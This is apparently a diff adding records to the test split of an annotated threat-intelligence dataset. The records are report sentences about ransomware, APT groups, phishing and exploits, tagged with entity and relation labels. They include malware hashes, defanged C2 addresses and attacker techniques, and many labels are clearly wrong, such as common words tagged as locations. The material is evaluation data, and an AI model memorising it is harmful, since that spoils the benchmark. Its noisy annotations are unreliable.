diff --git "a/test.jsonl" "b/test.jsonl" --- "a/test.jsonl" +++ "b/test.jsonl" @@ -1,459 +1,1460 @@ -{"id":1,"text":"This post is also available in: 日本語 (Japanese) CTB-Locker is a well-known ransomware Trojan used by crimeware groups to encrypt files on the victim's endpoints and demand ransom payment to decrypt the files back to their original state, but most antiviruses detect it by mistake as CryptoLocker (only one vendor correctly detects it as CTB-Locker).","entities":[{"id":45800,"label":"malware","start_offset":288,"end_offset":300},{"id":45801,"label":"malware","start_offset":53,"end_offset":63},{"id":45802,"label":"malware","start_offset":342,"end_offset":352}],"relations":[],"Comments":[]} -{"id":2,"text":"The attack vector is very basic and repeats itself: It begins with a spear phishing email sent with SCR attachments (double zipped).","entities":[{"id":48941,"label":"attack-pattern","start_offset":69,"end_offset":115}],"relations":[],"Comments":[]} +{"id":8565,"text":"APT35 has relied on this technique since 2017 \u2014 targeting high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security.","entities":[{"id":26465,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":26467,"label":"location","start_offset":93,"end_offset":101},{"id":26469,"label":"location","start_offset":137,"end_offset":140},{"id":26470,"label":"location","start_offset":141,"end_offset":149},{"id":26471,"label":"location","start_offset":150,"end_offset":158}],"relations":[],"Comments":[]} +{"id":9899,"text":"Table 1.","entities":[],"relations":[],"Comments":[]} +{"id":10086,"text":"This specific set of circumstances makes analysis by researchers more difficult, but it also limits the scope of its victims to some degree.","entities":[],"relations":[],"Comments":[]} +{"id":10904,"text":"The domain was acquired via the Porkbun network registrar.","entities":[],"relations":[],"Comments":[]} +{"id":4952,"text":"To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel.","entities":[{"id":50977,"label":"SOFTWARE","start_offset":39,"end_offset":47},{"id":50978,"label":"SOFTWARE","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} +{"id":5116,"text":"That's ridiculous.","entities":[],"relations":[],"Comments":[]} +{"id":7063,"text":" Some of the classes\u2019 names","entities":[],"relations":[],"Comments":[]} +{"id":13469,"text":"Generally, 2020 has been dominated by COVID-19.","entities":[],"relations":[],"Comments":[]} +{"id":2199,"text":" Subsequently, the malware proceeds to extract both the video player and the embedded malware using a series of calls to CreateFile, CreateFileMapping, GetFileSize, and MapViewOfFile.","entities":[],"relations":[],"Comments":[]} +{"id":5222,"text":"We also acknowledge the cooperation and engaging response that some vendors like ADLINK have adopted when we approached them with our findings.","entities":[{"id":51258,"label":"identity","start_offset":81,"end_offset":87}],"relations":[],"Comments":[]} +{"id":739,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":3516,"text":"It uses DLL injection to execute its routines.","entities":[],"relations":[],"Comments":[]} +{"id":11723,"text":"Fake DUser.dll Trojan.MSIL.SIDEWINDER.A CBD5C68F5C4345B68F018D9E5810574E8036A2BC4D826BE5C8779E8019449957 Final payload Trojan.Win32.SIDEWINDER.B 34446F7F60F730FCCA145155D10D1AFF0A1153B085836DF38313772CD03C8D70 RTF file Trojan.W97M.CVE201711882.YQUOOWV 7238F4E5EDBE0E5A2242D8780FB58C47E7D32BF2C4F860C88C511C30675D0857 RTF file ","entities":[{"id":36126,"label":"SHA2","start_offset":45,"end_offset":109},{"id":36127,"label":"SHA2","start_offset":156,"end_offset":220},{"id":36128,"label":"SHA2","start_offset":269,"end_offset":333}],"relations":[],"Comments":[]} +{"id":13094,"text":"System and software vulnerabilities could be probed to hijack devices, sabotage production processes and steal intellectual property.","entities":[],"relations":[],"Comments":[]} +{"id":4791,"text":"The harms from this industry are amply evident by this point, and we believe they outweigh any benefit to continued use.","entities":[],"relations":[],"Comments":[]} +{"id":12462,"text":"We terminated 3 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.","entities":[],"relations":[],"Comments":[]} +{"id":2555,"text":" Credential theft has been known to be a key part of the Shamoon 2 attacks.","entities":[{"id":47749,"label":"attack-pattern","start_offset":1,"end_offset":17},{"id":47750,"label":"threat-actor","start_offset":57,"end_offset":66}],"relations":[{"id":348,"from_id":47750,"to_id":47749,"type":"uses"}],"Comments":[]} +{"id":11026,"text":"The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains.","entities":[],"relations":[],"Comments":[]} +{"id":12213,"text":"We terminated 2 YouTube channels as part of our investigation into coordinated influence operations linked to Moldova.","entities":[],"relations":[],"Comments":[]} +{"id":3313,"text":"This command has a nearly identical function to \u201cGetBrowsersCookies\u201d, although it targets a browser\u2019s \u201cLogin Data\u201d files instead.","entities":[],"relations":[],"Comments":[]} +{"id":5113,"text":"I'm going to go with Hollywood's to blame a little bit here, because we're watching movies in Hollywood inevitably\u2026you know the hackers in their dark hat and with no lighting, underground, Lord knows where they find these places to hack from and they are attacking directly through.","entities":[],"relations":[],"Comments":[]} +{"id":12535,"text":"macOS Exploits","entities":[],"relations":[],"Comments":[]} +{"id":927,"text":" However, a number of strong issues still plague this malware family, such as the following: While this version is an improvement, it still lacks many of the features and stealth that are currently present in the larger ransomware families.","entities":[],"relations":[],"Comments":[]} +{"id":4658,"text":"After parsing, the cookies are inserted into a local cache used by the embedded web browser.","entities":[],"relations":[],"Comments":[]} +{"id":6785,"text":"As mentioned, the template contains malicious macro (MITRE ATT&CK framework ID T1064), which exports VBS (MITRE ATT&CK framework ID T1064) to execute itself.","entities":[],"relations":[],"Comments":[]} +{"id":6394,"text":"Evaluating netflow connections for 159.65.186[.]50 during this time window revealed several connections to ports 22, 443 and 8060 originating from a Ukrainian IP (213.200.56[.]105).","entities":[{"id":19831,"label":"IPV4","start_offset":35,"end_offset":50},{"id":19832,"label":"location","start_offset":63,"end_offset":67},{"id":19835,"label":"location","start_offset":121,"end_offset":124},{"id":19837,"label":"IPV4","start_offset":163,"end_offset":179}],"relations":[],"Comments":[]} +{"id":674,"text":"The Sofacy document before & after the content is enabled","entities":[{"id":46248,"label":"malware","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} +{"id":4940,"text":"The app was disguised as VPN software that, if installed, could steal sensitive information such as call logs, text messages, contacts, and location data from devices.","entities":[],"relations":[],"Comments":[]} +{"id":12623,"text":"Figure 4.","entities":[],"relations":[],"Comments":[]} +{"id":13188,"text":"Some backdoors used by Tropic Trooper use injection to execute its routines, while others execute directly and run itself consistently.","entities":[{"id":41147,"label":"threat-actor","start_offset":23,"end_offset":37},{"id":41148,"label":"location","start_offset":107,"end_offset":110}],"relations":[],"Comments":[]} +{"id":1143,"text":" Quick follow up analysis revealed that this mutex was also associated with the Allaple malware family.","entities":[{"id":3512,"label":"malware","start_offset":80,"end_offset":87}],"relations":[],"Comments":[]} +{"id":14299,"text":"In the case of the Windows variant (WORM_INFOKEY.A) of Maikspy last seen in April 2017, the user will be tricked into downloading a MiaKhalifa.rar file, which contains the files seen in the screenshot below:","entities":[{"id":48510,"label":"TIME","start_offset":76,"end_offset":86},{"id":48507,"label":"SOFTWARE","start_offset":19,"end_offset":27},{"id":48508,"label":"malware","start_offset":36,"end_offset":50},{"id":48509,"label":"malware","start_offset":55,"end_offset":63},{"id":48511,"label":"FILEPATH","start_offset":132,"end_offset":152}],"relations":[{"id":435,"from_id":48508,"to_id":48509,"type":"related-to"},{"id":436,"from_id":48508,"to_id":48507,"type":"duplicate-of"},{"id":437,"from_id":48509,"to_id":48510,"type":"related-to"},{"id":438,"from_id":48508,"to_id":48511,"type":"related-to"}],"Comments":[]} +{"id":3200,"text":"Visual C++ runtime, a legitimate and signed vc_redist.x??.exe, and Python runtime are then downloaded.","entities":[{"id":48325,"label":"FILEPATH","start_offset":44,"end_offset":61},{"id":48326,"label":"SOFTWARE","start_offset":0,"end_offset":18},{"id":48327,"label":"SOFTWARE","start_offset":67,"end_offset":81}],"relations":[],"Comments":[]} +{"id":3647,"text":"In this case, your best means of protection lies in prevention.","entities":[],"relations":[],"Comments":[]} +{"id":9560,"text":" HYPERSCRAPE requires the victim\u2019s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired.","entities":[],"relations":[],"Comments":[]} +{"id":388,"text":" Additionally, a purported proof of concept (PoC) has reached the public domain, increasing the threat this particular vulnerability poses.","entities":[],"relations":[],"Comments":[]} +{"id":912,"text":"On a test sandbox, the malware took upwards of 20 minutes to complete encryption, which is less than ideal for an attacker as it gives the victim time to notice the infection and stop it.","entities":[{"id":46434,"label":"TIME","start_offset":36,"end_offset":57}],"relations":[],"Comments":[]} +{"id":13611,"text":"Ulibs.dll loads Adob.dll, which is a ZIP archive.","entities":[{"id":51699,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":51700,"label":"FILEPATH","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} +{"id":4827,"text":"In addition to including phishing links directly in the email, the attackers also link to PDFs and\/or DOCs, hosted on Google Drive and Microsoft One Drive, that contain a link to an attacker-controlled phishing domain.","entities":[{"id":50777,"label":"attack-pattern","start_offset":25,"end_offset":39},{"id":50779,"label":"SOFTWARE","start_offset":135,"end_offset":154},{"id":50778,"label":"SOFTWARE","start_offset":118,"end_offset":130}],"relations":[],"Comments":[]} +{"id":14015,"text":"During the analysis of the samples captured from the previous campaign related to SLUB in 2019, one of the samples, the SLUB loader exploiting CVE-2019-0803, contained a version resource section that included intentionally misleading planted data.","entities":[{"id":47185,"label":"vulnerability","start_offset":143,"end_offset":156}],"relations":[],"Comments":[]} +{"id":2775,"text":" In our latest research, \u201cUnauthorized Coin Mining in the Browser\u201d, Unit 42 researchers show how cybercriminals have taken an old tactic, hijacking web browsers without the users consent or knowledge (commonly called a \u201cdrive -by attack\u201d), and adapted it to make money in the increasingly lucrative cryptocurrencies markets.","entities":[{"id":48004,"label":"attack-pattern","start_offset":26,"end_offset":50},{"id":45693,"label":"identity","start_offset":68,"end_offset":75},{"id":45694,"label":"attack-pattern","start_offset":138,"end_offset":160},{"id":45696,"label":"attack-pattern","start_offset":220,"end_offset":236}],"relations":[],"Comments":[]} +{"id":8368,"text":"03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6 cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa Microsoft Live DLL 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23 PDB E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\EmailDownloader\\obj\\Debug\\EmailDownloader.pdb E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\Mahdi\\LiveLib\\obj\\Release\\LiveLib.pdb","entities":[{"id":25748,"label":"SHA2","start_offset":0,"end_offset":64},{"id":25749,"label":"SHA1","start_offset":65,"end_offset":129},{"id":25750,"label":"SHA1","start_offset":130,"end_offset":194},{"id":25751,"label":"MD5","start_offset":195,"end_offset":259},{"id":25752,"label":"SHA2","start_offset":260,"end_offset":324},{"id":25753,"label":"SHA2","start_offset":325,"end_offset":389},{"id":25754,"label":"SHA2","start_offset":390,"end_offset":454},{"id":25755,"label":"SHA2","start_offset":455,"end_offset":519},{"id":25756,"label":"identity","start_offset":520,"end_offset":529},{"id":25757,"label":"MD5","start_offset":539,"end_offset":603}],"relations":[],"Comments":[]} +{"id":7134,"text":"We believe that this was a direct reaction to our research, suggesting that the threat actor read our investigation.","entities":[],"relations":[],"Comments":[]} +{"id":4593,"text":"In lieu of these exploits, let\u2019s take a look at how Trend Micro Vision One\u2122 and Trend Micro Cloud One\u2122 can provide protection against two of the four zero-days, CVE-2021-26855 and CVE-2021-27065.","entities":[{"id":50469,"label":"SOFTWARE","start_offset":52,"end_offset":75},{"id":50470,"label":"SOFTWARE","start_offset":80,"end_offset":102},{"id":50471,"label":"vulnerability","start_offset":161,"end_offset":175},{"id":50472,"label":"vulnerability","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} +{"id":4062,"text":"Write specified file 0x10002","entities":[],"relations":[],"Comments":[]} +{"id":8337,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[],"relations":[],"Comments":[]} +{"id":4613,"text":"Microsoft has since taken things a step further by creating patches for out-of-support versions of Exchange.","entities":[{"id":50517,"label":"identity","start_offset":0,"end_offset":9},{"id":50518,"label":"SOFTWARE","start_offset":99,"end_offset":107}],"relations":[],"Comments":[]} +{"id":6189,"text":" As soon as the user executes the malicious script in the email, a cookie stealer script will be delivered and launched on the browser.","entities":[{"id":19125,"label":"malware","start_offset":77,"end_offset":84},{"id":19126,"label":"location","start_offset":92,"end_offset":96},{"id":19127,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} +{"id":11229,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} +{"id":3825,"text":"Downloads response {Variable}.http.download Additional download function {Variable}.process Process-related functions {Variable}.process.currentPID Get Current Process ID {Variable}.process.list Enumerates Process {Variable}.process.kill Terminates Process {Variable}.registry Registry-related functions {Variable}.registry.HKCR Set HKEY_CLASSES_ROOT {","entities":[],"relations":[],"Comments":[]} +{"id":13888,"text":"DarkSide launches the Colonial Pipeline attack.","entities":[],"relations":[],"Comments":[]} +{"id":2139,"text":"Our customers should still deploy the security update as recommended above, but can and should deploy the latest vulnerability signature immediate for additional protection.","entities":[],"relations":[],"Comments":[]} +{"id":2682,"text":"LockBit 2.0 operators also released an information-stealer dubbed StealBit, which was developed to support affiliates of the LockBit 2.0 RaaS when exfiltrating data from breached companies.","entities":[{"id":45655,"label":"malware","start_offset":66,"end_offset":74},{"id":45654,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":45656,"label":"threat-actor","start_offset":125,"end_offset":136}],"relations":[{"id":111,"from_id":45655,"to_id":45654,"type":"authored-by"}],"Comments":[]} +{"id":1851,"text":" Figure 21. Execution of Mimikatz (above) and Impacket via C:\\temp\\wmiexec.exe (below)","entities":[{"id":45148,"label":"tools","start_offset":50,"end_offset":58},{"id":45146,"label":"tools","start_offset":29,"end_offset":37},{"id":45147,"label":"FILEPATH","start_offset":63,"end_offset":82}],"relations":[],"Comments":[]} +{"id":4172,"text":"Both share similar codes in configuration decoding, which is shown in Figure 14.","entities":[],"relations":[],"Comments":[]} +{"id":1098,"text":"A process that has the mutex knows that while it holds that mutex no other process will be accessing the cookie file.","entities":[],"relations":[],"Comments":[]} +{"id":7241,"text":"In the video, they purported to show a successful working exploit that spawns a cmd.exe shell, but a careful review of the video shows the exploit is fake.","entities":[{"id":22635,"label":"malware","start_offset":80,"end_offset":87},{"id":22636,"label":"location","start_offset":88,"end_offset":93}],"relations":[],"Comments":[]} +{"id":4824,"text":"They continue to use the 'Browser in the Browser' phishing technique that TAG first observed and described in March.","entities":[{"id":50769,"label":"attack-pattern","start_offset":26,"end_offset":68},{"id":50770,"label":"identity","start_offset":74,"end_offset":77},{"id":50771,"label":"TIME","start_offset":110,"end_offset":115}],"relations":[],"Comments":[]} +{"id":2389,"text":"While the older campaign uses a different shellcode loader, which we have named LavagokLdr, we have observed similar code and procedures between LavagokLdr and StealthVector.","entities":[{"id":47452,"label":"malware","start_offset":80,"end_offset":90},{"id":47453,"label":"malware","start_offset":145,"end_offset":155},{"id":47454,"label":"malware","start_offset":160,"end_offset":173}],"relations":[],"Comments":[]} +{"id":6623,"text":" https:\/\/unit42.paloaltonetworks.com\/unit42-magic-hound-campaign-attacks-saudi-targets\/","entities":[],"relations":[],"Comments":[]} +{"id":8899,"text":"Finding such entries that stand out could help identify how wide the infection is.","entities":[],"relations":[],"Comments":[]} +{"id":8247,"text":"Indicators of Compromise (IoCs) Domains dgfip-finances-gouv[.]cloud bellingstudio@gmail.com Tags","entities":[{"id":25473,"label":"EMAIL","start_offset":70,"end_offset":93}],"relations":[],"Comments":[]} +{"id":13844,"text":"through","entities":[],"relations":[],"Comments":[]} +{"id":553,"text":"Once a ransom is received, the ransom will be involved in the multiple transactions that are managed to distribute and aggregate the ransom across thousands of virtual wallets.","entities":[],"relations":[],"Comments":[]} +{"id":12783,"text":"Figure 2:","entities":[],"relations":[],"Comments":[]} +{"id":13958,"text":"For example, some security experts noted that Colonial Pipeline was using a previously exploited vulnerable version of Microsoft Exchange, among other cybersecurity lapses.","entities":[],"relations":[],"Comments":[]} +{"id":14337,"text":"Based on these findings, it\u2019s possible that the attackers behind Maikspy operate \/\/www[.]roundyearfun[.]org\/ and hxxp:\/\/miakhalifagame[.]com\/.","entities":[{"id":48565,"label":"malware","start_offset":65,"end_offset":73},{"id":48568,"label":"URL","start_offset":113,"end_offset":141},{"id":48566,"label":"URL","start_offset":83,"end_offset":108}],"relations":[{"id":446,"from_id":48565,"to_id":48566,"type":"beacons-to"},{"id":447,"from_id":48565,"to_id":48568,"type":"beacons-to"}],"Comments":[]} +{"id":3741,"text":"Proofs of concept available on GitHub.","entities":[{"id":49560,"label":"SOFTWARE","start_offset":31,"end_offset":37}],"relations":[],"Comments":[]} +{"id":1959,"text":"Trend Micro\u2122 Smart Protection for Endpoints with Maximum XGen\u2122 security infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across user activity and any endpoint, offering the broadest possible protection against advanced attacks.","entities":[{"id":47083,"label":"SOFTWARE","start_offset":0,"end_offset":62}],"relations":[],"Comments":[]} +{"id":1770,"text":"Only when attackers have the right to read\/write any address can they utilize either Flash or ActiveX methods to get code execution.","entities":[],"relations":[],"Comments":[]} +{"id":3352,"text":"It possesses many features, such as the ability to use scheduled tasks as a method of maintaining persistence in the infected system.","entities":[],"relations":[],"Comments":[]} +{"id":5813,"text":"No, absolutely.","entities":[],"relations":[],"Comments":[]} +{"id":13904,"text":"The file-sharing services used by the group for data exfiltration include Mega and PrivatLab.","entities":[{"id":48720,"label":"tools","start_offset":74,"end_offset":79},{"id":48721,"label":"tools","start_offset":83,"end_offset":92}],"relations":[],"Comments":[]} +{"id":12552,"text":"Analyzing the Mach-O was reminiscent of a CTF reverse engineering challenge.","entities":[{"id":39055,"label":"location","start_offset":14,"end_offset":18},{"id":39056,"label":"attack-pattern","start_offset":46,"end_offset":65},{"id":39057,"label":"location","start_offset":66,"end_offset":75}],"relations":[],"Comments":[]} +{"id":13288,"text":"Reverse analysis of TClient allowed us to determine how to decrypt the C&C information.","entities":[{"id":41382,"label":"malware","start_offset":20,"end_offset":27}],"relations":[],"Comments":[]} +{"id":3286,"text":"The malware downloads the screenshot-cmd tool if it is not found in the root directory.","entities":[],"relations":[],"Comments":[]} +{"id":4615,"text":" Fig - Microsoft Exchange Server Possible ASPX Web Shell The above model triggers when a new web shell is created.","entities":[{"id":50522,"label":"vulnerability","start_offset":11,"end_offset":60}],"relations":[],"Comments":[]} +{"id":3736,"text":"Timeline for VMware Vulnerabilities CVE-2022-22954 in the Wild Direct Downloads Mirai\/Gafgyt Dropper Scripts or Variants Webshells Perl Shellbot Base64 Injections SSH Key Targeting CVE-2022-22960 in the Wild Conclusion Indicators of Compromise","entities":[{"id":49545,"label":"vulnerability","start_offset":13,"end_offset":50},{"id":49546,"label":"malware","start_offset":80,"end_offset":85},{"id":49547,"label":"malware","start_offset":86,"end_offset":100},{"id":49548,"label":"vulnerability","start_offset":181,"end_offset":195}],"relations":[{"id":827,"from_id":49546,"to_id":49547,"type":"related-to"},{"id":828,"from_id":49546,"to_id":49545,"type":"exploits"},{"id":829,"from_id":49546,"to_id":49548,"type":"exploits"}],"Comments":[]} +{"id":6583,"text":" Figure 4: Screenshot of secure[.]66[.]to","entities":[],"relations":[],"Comments":[]} +{"id":850,"text":" The crux of what makes this attack technique so important is how the technique uses this level of control to have legitimate programs run illegitimate commands.","entities":[],"relations":[],"Comments":[]} +{"id":4178,"text":"For example, the group can map their target\u2019s network infrastructure and bypass firewalls.","entities":[{"id":49981,"label":"attack-pattern","start_offset":73,"end_offset":89},{"id":49982,"label":"attack-pattern","start_offset":27,"end_offset":68}],"relations":[],"Comments":[]} +{"id":1632,"text":"To raise the ranking of these apps, the author appears to have given many of them five-star ratings.","entities":[],"relations":[],"Comments":[]} +{"id":1531,"text":"Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading to remote code execution.","entities":[{"id":46794,"label":"attack-pattern","start_offset":103,"end_offset":124}],"relations":[],"Comments":[]} +{"id":3781,"text":" Mirai\/Gafgyt dropper scripts or variants Perl Shellbot Coinminer activity Webshell downloads (full injected command) Callback\/Scanning activity Direct Download exploits where payloads were no longer live at the time of analysis: Sample hashes 801b23bffa65facee1da69bc6f72f8e1e4e1aeefc63dfd3a99b238d4f9d0a637 6d403c3fc246d6d493a6f4acc18c1c292f710db6ad9c3ea2ff065595c5ad3c5b 940a674cfe8179b2b8964bf408037e0e5a5ab7e47354fe4fa7a9289732e1f1b8 fdc94d0dedf6e53dd435d2b5eacb4c34923fadee50529db6f3de38c71f325e05 85143ecc41fb6aadd822ed2d6f20c721a83ae1088f406f29b8b0b05459053a03 bot.v 0b4b25fab4c922e752e689111f38957e0402fd83f6b1d69e8f43c6f4b68fc1ba C2 server : 5[.]39.217.212:80","entities":[{"id":11449,"label":"malware","start_offset":58,"end_offset":67},{"id":11452,"label":"SHA2","start_offset":251,"end_offset":315},{"id":11453,"label":"SHA2","start_offset":316,"end_offset":380},{"id":11454,"label":"SHA2","start_offset":381,"end_offset":445},{"id":11455,"label":"SHA2","start_offset":446,"end_offset":510},{"id":11456,"label":"SHA2","start_offset":511,"end_offset":575},{"id":11457,"label":"SHA2","start_offset":583,"end_offset":647},{"id":49619,"label":"IPV4","start_offset":660,"end_offset":677},{"id":49620,"label":"malware","start_offset":1,"end_offset":21}],"relations":[{"id":845,"from_id":11453,"to_id":49620,"type":"indicates"},{"id":844,"from_id":11452,"to_id":49620,"type":"indicates"},{"id":846,"from_id":11454,"to_id":49620,"type":"indicates"},{"id":847,"from_id":11455,"to_id":49620,"type":"indicates"},{"id":848,"from_id":11456,"to_id":49620,"type":"indicates"},{"id":849,"from_id":11457,"to_id":49620,"type":"indicates"},{"id":850,"from_id":49620,"to_id":49619,"type":"communicates-with"}],"Comments":[]} +{"id":1414,"text":" To determine where the highest number of infected nodes are, we mapped the sending IP address for each of the attach e-mails to their rough geographic location.","entities":[],"relations":[],"Comments":[]} +{"id":1956,"text":"For organizations, Trend Micro\u2122 Mobile Security for Enterprise provides device, compliance and application management, data protection, and configuration provisioning.","entities":[{"id":45194,"label":"SOFTWARE","start_offset":19,"end_offset":62}],"relations":[],"Comments":[]} +{"id":2751,"text":"In addition to storing variables, Bash allows for storing shell functions in variables that users can call later.","entities":[{"id":45686,"label":"SOFTWARE","start_offset":34,"end_offset":38}],"relations":[],"Comments":[]} +{"id":9689,"text":"Figure 18.","entities":[],"relations":[],"Comments":[]} +{"id":2087,"text":" x4k has a very solid online presence, which has enabled us to uncover much of his activity in these last two years.","entities":[{"id":47219,"label":"TIME","start_offset":101,"end_offset":115},{"id":47218,"label":"threat-actor","start_offset":1,"end_offset":4}],"relations":[],"Comments":[]} +{"id":776,"text":" Figure 9: field \u201cTotalMemorySize\u201d of st_ProtecFreeManageHeap is greater than threshold ","entities":[],"relations":[],"Comments":[]} +{"id":4187,"text":"Command and Scripting Interpreter: PowerShell T1059.003 Command and scripting interpreter: Windows Command Shell T1569.002","entities":[{"id":49988,"label":"tools","start_offset":35,"end_offset":45},{"id":49989,"label":"tools","start_offset":91,"end_offset":112}],"relations":[],"Comments":[]} +{"id":1844,"text":" Figure 19.","entities":[],"relations":[],"Comments":[]} +{"id":6043,"text":"The attackers placed links to the exploit kit within hidden iframes, which they embedded on both websites they owned as well as some websites they compromised.","entities":[],"relations":[],"Comments":[]} +{"id":6830,"text":"Our team of analysts and security experts is focused on identifying and stopping issues like phishing campaigns, zero-day vulnerabilities and hacking against Google, our products and our users.","entities":[{"id":21272,"label":"location","start_offset":21,"end_offset":24},{"id":21273,"label":"location","start_offset":25,"end_offset":33},{"id":21274,"label":"location","start_offset":68,"end_offset":71},{"id":21275,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":21277,"label":"location","start_offset":138,"end_offset":141},{"id":21279,"label":"location","start_offset":179,"end_offset":182}],"relations":[],"Comments":[]} +{"id":483,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":11154,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 of 2020.","entities":[],"relations":[],"Comments":[]} +{"id":38,"text":"In the mid-2000s, criminals made great profits from using Banking Trojans to steal credentials for online banking websites, and subsequently draining the accounts\u2019 associated funds.","entities":[{"id":45811,"label":"TIME","start_offset":7,"end_offset":16},{"id":45812,"label":"attack-pattern","start_offset":77,"end_offset":94}],"relations":[],"Comments":[]} +{"id":3978,"text":"The Cybersecurity and Infrastructure Security Agency (CISA) and the National Institute for Standards and Technology (NIST) recently published \u201cDefending Against Software Supply Chain Attacks\u201d.","entities":[{"id":49852,"label":"identity","start_offset":68,"end_offset":122},{"id":49851,"label":"identity","start_offset":4,"end_offset":59}],"relations":[],"Comments":[]} +{"id":9290,"text":"Figure 1. Mirrorthief attack chain Figure 2.","entities":[],"relations":[],"Comments":[]} +{"id":11977,"text":"It was last updated on April 20, 2021.","entities":[],"relations":[],"Comments":[]} +{"id":12978,"text":"NOTE: On May 20th, we updated our attribution to more precisely describe our findings.","entities":[],"relations":[],"Comments":[]} +{"id":1820,"text":"The tools transferred using AnyDesk are: Netscan: To scan for other endpoints Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints Hacking tools Mimikatz and Impacket: For lateral movement PDQ deploy: For mass deployment of malicious script to multiple endpoints Aswarpot.sys: For disabling defense solutions.","entities":[{"id":46938,"label":"tools","start_offset":28,"end_offset":35},{"id":46944,"label":"tools","start_offset":158,"end_offset":166},{"id":46951,"label":"attack-pattern","start_offset":294,"end_offset":321},{"id":46940,"label":"tools","start_offset":79,"end_offset":83},{"id":46942,"label":"FILEPATH","start_offset":85,"end_offset":98},{"id":46947,"label":"tools","start_offset":171,"end_offset":179},{"id":46939,"label":"tools","start_offset":42,"end_offset":49},{"id":46943,"label":"vulnerability","start_offset":113,"end_offset":122},{"id":46950,"label":"FILEPATH","start_offset":276,"end_offset":288},{"id":46948,"label":"attack-pattern","start_offset":185,"end_offset":201},{"id":46949,"label":"attack-pattern","start_offset":218,"end_offset":253},{"id":46953,"label":"tools","start_offset":202,"end_offset":212},{"id":46956,"label":"tools","start_offset":276,"end_offset":284},{"id":46955,"label":"attack-pattern","start_offset":104,"end_offset":108}],"relations":[{"id":272,"from_id":46938,"to_id":46947,"type":"downloads"},{"id":267,"from_id":46938,"to_id":46939,"type":"downloads"},{"id":268,"from_id":46938,"to_id":46940,"type":"downloads"},{"id":269,"from_id":46940,"to_id":46942,"type":"uses"},{"id":271,"from_id":46938,"to_id":46944,"type":"downloads"},{"id":273,"from_id":46938,"to_id":46953,"type":"downloads"},{"id":276,"from_id":46938,"to_id":46956,"type":"downloads"}],"Comments":[]} +{"id":854,"text":" Taken altogether, these make kernel APC attacks an effective and sophisticated technique.","entities":[{"id":46396,"label":"attack-pattern","start_offset":30,"end_offset":48}],"relations":[],"Comments":[]} +{"id":13541,"text":"Victims are now mainly located only in Japan.","entities":[{"id":51611,"label":"location","start_offset":39,"end_offset":44},{"id":51612,"label":"identity","start_offset":0,"end_offset":7}],"relations":[{"id":1111,"from_id":51612,"to_id":51611,"type":"located-at"}],"Comments":[]} +{"id":12666,"text":"For zero-day vulnerabilities, take advantage of virtual patching.","entities":[],"relations":[],"Comments":[]} +{"id":11048,"text":"We terminated 35 YouTube channels as part of our investigation into coordinated influence operations linked to Azerbaijan.","entities":[],"relations":[],"Comments":[]} +{"id":6186,"text":"We think the threat actor used this approach to attempt to infect the victim\u2019s contacts for further propagation.","entities":[],"relations":[],"Comments":[]} +{"id":3715,"text":"After moving through the network and identifying assets to target, the next step would be to gather key data.","entities":[],"relations":[],"Comments":[]} +{"id":3793,"text":" July ChessMaster Campaign November ChessMaster Campaign Current ChessMaster Campaign","entities":[{"id":49639,"label":"campaign","start_offset":8,"end_offset":19},{"id":49642,"label":"campaign","start_offset":38,"end_offset":49},{"id":49643,"label":"campaign","start_offset":67,"end_offset":78},{"id":49640,"label":"TIME","start_offset":3,"end_offset":7},{"id":49641,"label":"TIME","start_offset":29,"end_offset":37}],"relations":[],"Comments":[]} +{"id":5332,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} +{"id":11722,"text":"Malicious documents and related payloads IoCs Indicator Description Detection TrendX 1CBEC920AFE2F978B8F84E0A4E6B757D400AEB96E8C0A221130060B196ECE010 docx Trojan.W97M.CVE20170199.FAIL 7238F4E5EDBE0E5A2242D8780FB58C47E7D32BF2C4F860C88C511C30675D0857 RTF file Trojan.W97M.SIDEWINDER.A 75C158CEA14E338C8D9D32ED988C7032DA9AE6D54F5B1126ED6A83F71B9E03BF 1.a JS file Trojan.JS.SIDEWINDER.A Downloader.JS.TRX.XXJSE9EFF018 AB6E8563214EEB747ABF77F9CC50796CC6A0C0562C6BEC720D7F2C978D34C412 